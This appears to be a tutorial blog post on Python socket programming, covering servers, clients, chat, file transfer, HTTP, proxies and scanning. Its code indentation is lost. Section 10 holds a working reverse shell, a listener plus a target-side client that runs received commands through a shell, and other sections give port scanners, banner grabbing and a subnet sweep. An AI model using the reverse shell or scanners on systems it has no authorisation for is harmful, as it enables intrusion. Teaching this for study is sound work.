2117 words
11 minutes
Python Socket Programming - Complete Guide

πŸ”Œ Python Socket Programming - Complete Guide#

Socket Programming


πŸ“š Table of Contents#

  1. What are Sockets?
  2. Socket Basics
  3. TCP vs UDP
  4. Creating a TCP Server
  5. Creating a TCP Client
  6. UDP Server and Client
  7. Port Scanner
  8. Chat Application
  9. File Transfer
  10. Reverse Shell
  11. HTTP Server
  12. Socket Options
  13. Non-blocking Sockets
  14. Multi-threaded Server
  15. Practical Projects

1. What are Sockets?#

Socket Concept

Sockets are endpoints for sending and receiving data across a network.

Think of it like a phone call:

  • Server = Person waiting for calls
  • Client = Person making the call
  • Socket = The phone
  • Port = Phone number

Why Learn Sockets?#

  • βœ… Build network tools
  • βœ… Create chat applications
  • βœ… Make port scanners
  • βœ… Understand how internet works
  • βœ… Security testing & hacking

2. Socket Basics#

Import the Module#

import socket

Create a Socket#

# TCP Socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# UDP Socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

Parameters Explained#

ParameterMeaning
AF_INETIPv4 addresses
AF_INET6IPv6 addresses
SOCK_STREAMTCP (reliable)
SOCK_DGRAMUDP (fast)

Basic Methods#

# Server methods
sock.bind((host, port)) # Attach to address
sock.listen(5) # Start listening
sock.accept() # Accept connection
# Client methods
sock.connect((host, port)) # Connect to server
# Both
sock.send(data) # Send data
sock.recv(1024) # Receive data
sock.close() # Close socket

Get Your IP Address#

import socket
# Get hostname
hostname = socket.gethostname()
print(f"Hostname: {hostname}")
# Get IP address
ip = socket.gethostbyname(hostname)
print(f"IP Address: {ip}")
# Get IP from domain
google_ip = socket.gethostbyname("google.com")
print(f"Google IP: {google_ip}")

3. TCP vs UDP#

TCP vs UDP

TCP (Transmission Control Protocol)#

  • βœ… Reliable - guarantees delivery
  • βœ… Ordered - data arrives in sequence
  • βœ… Connection-based
  • ❌ Slower
  • Use for: Web, Email, File transfer

UDP (User Datagram Protocol)#

  • βœ… Fast
  • βœ… No connection needed
  • ❌ No guarantee of delivery
  • ❌ No order guarantee
  • Use for: Gaming, Streaming, DNS

4. Creating a TCP Server#

Server

Simple TCP Server#

import socket
# Create socket
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Allow reuse of address
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Bind to address
HOST = "0.0.0.0" # Listen on all interfaces
PORT = 9999
server.bind((HOST, PORT))
# Start listening (max 5 queued connections)
server.listen(5)
print(f"[*] Server listening on {HOST}:{PORT}")
# Accept connections
while True:
client_socket, client_address = server.accept()
print(f"[+] Connection from {client_address}")
# Receive data
data = client_socket.recv(1024)
print(f"[*] Received: {data.decode()}")
# Send response
response = "Message received!"
client_socket.send(response.encode())
# Close connection
client_socket.close()

Server with Multiple Messages#

import socket
def start_server(host="0.0.0.0", port=9999):
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind((host, port))
server.listen(5)
print(f"[*] Server started on {host}:{port}")
while True:
client, addr = server.accept()
print(f"[+] {addr} connected")
# Keep connection open
while True:
try:
data = client.recv(1024)
if not data:
break
message = data.decode().strip()
print(f"[{addr}] {message}")
# Echo back
client.send(f"Echo: {message}\n".encode())
if message.lower() == "quit":
break
except ConnectionResetError:
break
print(f"[-] {addr} disconnected")
client.close()
if __name__ == "__main__":
start_server()

5. Creating a TCP Client#

Simple TCP Client#

import socket
# Create socket
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect to server
HOST = "127.0.0.1"
PORT = 9999
client.connect((HOST, PORT))
print(f"[*] Connected to {HOST}:{PORT}")
# Send data
message = "Hello, Server!"
client.send(message.encode())
# Receive response
response = client.recv(1024)
print(f"[*] Response: {response.decode()}")
# Close connection
client.close()

Interactive Client#

import socket
def start_client(host="127.0.0.1", port=9999):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
client.connect((host, port))
print(f"[*] Connected to {host}:{port}")
print("[*] Type 'quit' to exit\n")
while True:
# Get user input
message = input("You: ")
if not message:
continue
# Send message
client.send(message.encode())
if message.lower() == "quit":
break
# Receive response
response = client.recv(1024)
print(f"Server: {response.decode()}")
except ConnectionRefusedError:
print("[!] Connection refused. Is the server running?")
finally:
client.close()
print("[*] Disconnected")
if __name__ == "__main__":
start_client()

6. UDP Server and Client#

UDP Server#

import socket
# Create UDP socket
server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
HOST = "0.0.0.0"
PORT = 9999
server.bind((HOST, PORT))
print(f"[*] UDP Server listening on {HOST}:{PORT}")
while True:
# Receive data and address
data, addr = server.recvfrom(1024)
print(f"[{addr}] {data.decode()}")
# Send response
response = f"Received: {data.decode()}"
server.sendto(response.encode(), addr)

UDP Client#

import socket
# Create UDP socket
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
HOST = "127.0.0.1"
PORT = 9999
# Send data (no connection needed!)
message = "Hello UDP Server!"
client.sendto(message.encode(), (HOST, PORT))
# Receive response
data, server = client.recvfrom(1024)
print(f"Response: {data.decode()}")
client.close()

7. Port Scanner#

Port Scanner

Simple Port Scanner#

import socket
def scan_port(host, port):
"""Check if a port is open"""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1) # 1 second timeout
result = sock.connect_ex((host, port))
sock.close()
return result == 0 # True if open
# Scan common ports
target = "127.0.0.1"
common_ports = [21, 22, 23, 25, 53, 80, 110, 143, 443, 445, 3306, 3389, 8080]
print(f"Scanning {target}...")
for port in common_ports:
if scan_port(target, port):
print(f"[+] Port {port}: OPEN")

Advanced Port Scanner with Threads#

import socket
import threading
from queue import Queue
# Thread-safe print
print_lock = threading.Lock()
def scan_port(host, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(0.5)
result = sock.connect_ex((host, port))
sock.close()
if result == 0:
with print_lock:
try:
service = socket.getservbyport(port)
except:
service = "unknown"
print(f"[+] Port {port:5} OPEN ({service})")
def worker(host, port_queue):
while True:
port = port_queue.get()
scan_port(host, port)
port_queue.task_done()
def port_scanner(host, start_port=1, end_port=1024, threads=100):
print(f"\n{'='*50}")
print(f"Scanning {host}")
print(f"Ports: {start_port} - {end_port}")
print(f"{'='*50}\n")
# Create queue
port_queue = Queue()
# Start threads
for _ in range(threads):
t = threading.Thread(target=worker, args=(host, port_queue))
t.daemon = True
t.start()
# Add ports to queue
for port in range(start_port, end_port + 1):
port_queue.put(port)
# Wait for completion
port_queue.join()
print(f"\n{'='*50}")
print("Scan complete!")
if __name__ == "__main__":
target = input("Enter target IP: ")
port_scanner(target, 1, 1024)
import socket
def grab_banner(host, port):
"""Get service banner"""
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2)
sock.connect((host, port))
# Send empty request for some services
sock.send(b"HEAD / HTTP/1.1\r\n\r\n")
banner = sock.recv(1024).decode().strip()
sock.close()
return banner
except:
return None
# Scan and grab banners
target = "127.0.0.1"
ports = [21, 22, 80, 443]
for port in ports:
banner = grab_banner(target, port)
if banner:
print(f"Port {port}:")
print(f" {banner[:100]}...")
print()

8. Chat Application#

Chat Server#

import socket
import threading
clients = []
nicknames = []
def broadcast(message):
"""Send message to all clients"""
for client in clients:
try:
client.send(message)
except:
remove_client(client)
def remove_client(client):
"""Remove disconnected client"""
if client in clients:
index = clients.index(client)
clients.remove(client)
nickname = nicknames[index]
nicknames.remove(nickname)
broadcast(f"[SERVER] {nickname} left the chat!".encode())
def handle_client(client):
"""Handle individual client"""
while True:
try:
message = client.recv(1024)
if message:
broadcast(message)
else:
remove_client(client)
break
except:
remove_client(client)
break
def start_server():
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(("0.0.0.0", 9999))
server.listen(10)
print("[*] Chat Server started on port 9999")
while True:
client, address = server.accept()
print(f"[+] {address} connected")
# Get nickname
client.send("NICK".encode())
nickname = client.recv(1024).decode()
nicknames.append(nickname)
clients.append(client)
print(f"[*] Nickname: {nickname}")
broadcast(f"[SERVER] {nickname} joined the chat!".encode())
client.send("[SERVER] Connected to chat!".encode())
# Start thread for client
thread = threading.Thread(target=handle_client, args=(client,))
thread.start()
if __name__ == "__main__":
start_server()

Chat Client#

import socket
import threading
nickname = input("Enter nickname: ")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(("127.0.0.1", 9999))
def receive():
"""Receive messages"""
while True:
try:
message = client.recv(1024).decode()
if message == "NICK":
client.send(nickname.encode())
else:
print(message)
except:
print("[!] Connection lost!")
client.close()
break
def write():
"""Send messages"""
while True:
message = input("")
if message.lower() == "/quit":
client.close()
break
client.send(f"[{nickname}] {message}".encode())
# Start threads
receive_thread = threading.Thread(target=receive)
receive_thread.start()
write_thread = threading.Thread(target=write)
write_thread.start()

9. File Transfer#

File Server (Sender)#

import socket
import os
def send_file(filename, host="0.0.0.0", port=9999):
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((host, port))
server.listen(1)
print(f"[*] Waiting for connection on port {port}...")
client, addr = server.accept()
print(f"[+] {addr} connected")
# Send filename
client.send(filename.encode())
# Wait for acknowledgment
client.recv(1024)
# Send file size
filesize = os.path.getsize(filename)
client.send(str(filesize).encode())
# Wait for acknowledgment
client.recv(1024)
# Send file
with open(filename, "rb") as f:
bytes_sent = 0
while bytes_sent < filesize:
data = f.read(4096)
client.send(data)
bytes_sent += len(data)
print(f"\r[*] Sent: {bytes_sent}/{filesize} bytes", end="")
print(f"\n[+] File sent successfully!")
client.close()
server.close()
if __name__ == "__main__":
send_file("test.txt")

File Client (Receiver)#

import socket
def receive_file(host="127.0.0.1", port=9999):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
print(f"[*] Connected to {host}:{port}")
# Receive filename
filename = client.recv(1024).decode()
print(f"[*] Receiving: {filename}")
client.send(b"OK")
# Receive file size
filesize = int(client.recv(1024).decode())
print(f"[*] File size: {filesize} bytes")
client.send(b"OK")
# Receive file
with open(f"received_{filename}", "wb") as f:
bytes_received = 0
while bytes_received < filesize:
data = client.recv(4096)
f.write(data)
bytes_received += len(data)
print(f"\r[*] Received: {bytes_received}/{filesize} bytes", end="")
print(f"\n[+] File saved as: received_{filename}")
client.close()
if __name__ == "__main__":
receive_file()

10. Reverse Shell#

⚠️ WARNING: For educational purposes only! Only use on systems you own or have permission to test.

Reverse Shell Server (Attacker)#

import socket
def start_listener(host="0.0.0.0", port=4444):
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind((host, port))
server.listen(1)
print(f"[*] Listening on {host}:{port}")
client, addr = server.accept()
print(f"[+] Connection from {addr}")
while True:
command = input("Shell> ")
if command.lower() == "exit":
client.send(b"exit")
break
if not command:
continue
client.send(command.encode())
response = client.recv(65535).decode()
print(response)
client.close()
server.close()
if __name__ == "__main__":
start_listener()

Reverse Shell Client (Target)#

import socket
import subprocess
import os
def connect_back(host="127.0.0.1", port=4444):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
while True:
command = client.recv(1024).decode()
if command.lower() == "exit":
break
# Handle cd command
if command.startswith("cd "):
try:
os.chdir(command[3:])
output = f"Changed to: {os.getcwd()}"
except:
output = "Directory not found"
else:
# Execute command
try:
output = subprocess.check_output(
command,
shell=True,
stderr=subprocess.STDOUT
).decode()
except Exception as e:
output = str(e)
if not output:
output = "Command executed (no output)"
client.send(output.encode())
client.close()
if __name__ == "__main__":
connect_back()

11. HTTP Server#

Simple HTTP Server#

import socket
def http_server(host="0.0.0.0", port=8080):
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind((host, port))
server.listen(5)
print(f"[*] HTTP Server running on http://{host}:{port}")
while True:
client, addr = server.accept()
# Receive request
request = client.recv(4096).decode()
# Parse request
if request:
method = request.split()[0]
path = request.split()[1]
print(f"[{addr[0]}] {method} {path}")
# Create response
html = """<!DOCTYPE html>
<html>
<head><title>Python HTTP Server</title></head>
<body>
<h1>Hello from Python!</h1>
<p>You requested: {}</p>
</body>
</html>""".format(path)
response = f"""HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: {len(html)}
Connection: close
{html}"""
client.send(response.encode())
client.close()
if __name__ == "__main__":
http_server()

12. Socket Options#

import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Reuse address (avoid "Address already in use")
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Set timeout (seconds)
sock.settimeout(5.0)
# Keep connection alive
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
# Set buffer sizes
sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 8192) # Receive buffer
sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 8192) # Send buffer
# Disable Nagle's algorithm (send immediately)
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
# Get option value
value = sock.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF)
print(f"Receive buffer size: {value}")

13. Non-blocking Sockets#

Using select()#

import socket
import select
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.setblocking(False)
server.bind(("0.0.0.0", 9999))
server.listen(5)
sockets_list = [server]
clients = {}
print("[*] Non-blocking server started")
while True:
# Wait for activity on any socket
read_sockets, _, exception_sockets = select.select(
sockets_list, [], sockets_list
)
for sock in read_sockets:
# New connection
if sock == server:
client, addr = server.accept()
client.setblocking(False)
sockets_list.append(client)
clients[client] = addr
print(f"[+] {addr} connected")
# Message from client
else:
try:
data = sock.recv(1024)
if data:
print(f"[{clients[sock]}] {data.decode()}")
# Broadcast to others
for client in clients:
if client != sock:
client.send(data)
else:
# Client disconnected
print(f"[-] {clients[sock]} disconnected")
sockets_list.remove(sock)
del clients[sock]
except:
continue
# Handle exceptions
for sock in exception_sockets:
sockets_list.remove(sock)
del clients[sock]

14. Multi-threaded Server#

import socket
import threading
class ClientThread(threading.Thread):
def __init__(self, client_socket, client_address):
threading.Thread.__init__(self)
self.client = client_socket
self.address = client_address
def run(self):
print(f"[+] Thread started for {self.address}")
while True:
try:
data = self.client.recv(1024)
if not data:
break
message = data.decode()
print(f"[{self.address}] {message}")
# Echo back
self.client.send(f"Echo: {message}".encode())
except ConnectionResetError:
break
print(f"[-] {self.address} disconnected")
self.client.close()
def main():
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(("0.0.0.0", 9999))
server.listen(10)
print("[*] Multi-threaded server started on port 9999")
while True:
client, addr = server.accept()
thread = ClientThread(client, addr)
thread.start()
if __name__ == "__main__":
main()

15. Practical Projects#

Project 1: Network Discovery Tool#

import socket
import threading
from queue import Queue
def scan_host(ip):
"""Check if host is alive"""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(0.5)
result = sock.connect_ex((ip, 80))
sock.close()
if result == 0:
try:
hostname = socket.gethostbyaddr(ip)[0]
except:
hostname = "Unknown"
print(f"[+] {ip:15} - ALIVE ({hostname})")
def network_scan(network="192.168.1"):
"""Scan entire network"""
print(f"[*] Scanning {network}.0/24\n")
threads = []
for i in range(1, 255):
ip = f"{network}.{i}"
t = threading.Thread(target=scan_host, args=(ip,))
threads.append(t)
t.start()
for t in threads:
t.join()
if __name__ == "__main__":
network_scan("192.168.1")

Project 2: DNS Lookup Tool#

import socket
def dns_lookup(domain):
"""Perform DNS lookup"""
print(f"\n[*] DNS Lookup for: {domain}\n")
# A Record (IPv4)
try:
ipv4 = socket.gethostbyname(domain)
print(f"IPv4 (A): {ipv4}")
except:
print("IPv4: Not found")
# All addresses
try:
results = socket.getaddrinfo(domain, None)
ipv4_addrs = set()
ipv6_addrs = set()
for result in results:
family = result[0]
addr = result[4][0]
if family == socket.AF_INET:
ipv4_addrs.add(addr)
elif family == socket.AF_INET6:
ipv6_addrs.add(addr)
print(f"\nAll IPv4 addresses:")
for addr in ipv4_addrs:
print(f" - {addr}")
print(f"\nAll IPv6 addresses:")
for addr in ipv6_addrs:
print(f" - {addr}")
except socket.gaierror as e:
print(f"Error: {e}")
# Test
dns_lookup("google.com")
dns_lookup("github.com")

Project 3: Simple Proxy Server#

import socket
import threading
def handle_client(client_socket):
"""Forward requests to destination"""
# Receive request from client
request = client_socket.recv(4096)
# Parse the first line to get host
first_line = request.split(b'\n')[0]
url = first_line.split()[1]
# Extract host and port
http_pos = url.find(b"://")
if http_pos != -1:
url = url[http_pos + 3:]
port_pos = url.find(b":")
host_pos = url.find(b"/")
if host_pos == -1:
host_pos = len(url)
if port_pos == -1 or port_pos > host_pos:
port = 80
host = url[:host_pos]
else:
port = int(url[port_pos + 1:host_pos])
host = url[:port_pos]
# Connect to destination
try:
dest = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
dest.connect((host.decode(), port))
dest.send(request)
while True:
data = dest.recv(4096)
if len(data) > 0:
client_socket.send(data)
else:
break
dest.close()
except Exception as e:
print(f"Error: {e}")
client_socket.close()
def proxy_server(host="0.0.0.0", port=8888):
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind((host, port))
server.listen(10)
print(f"[*] Proxy server running on {host}:{port}")
while True:
client, addr = server.accept()
print(f"[+] Request from {addr}")
thread = threading.Thread(target=handle_client, args=(client,))
thread.start()
if __name__ == "__main__":
proxy_server()

🎯 Quick Reference#

FunctionDescription
socket()Create a socket
bind()Bind to address
listen()Start listening
accept()Accept connection
connect()Connect to server
send()Send data
recv()Receive data
close()Close socket
settimeout()Set timeout
gethostname()Get local hostname
gethostbyname()Resolve hostname

πŸŽ‰ You’re Now a Socket Master!#

Practice by building:

  • Port scanners
  • Chat applications
  • File transfer tools
  • Network utilities
  • Security tools

Created by cat0x01 πŸ₯·πŸ»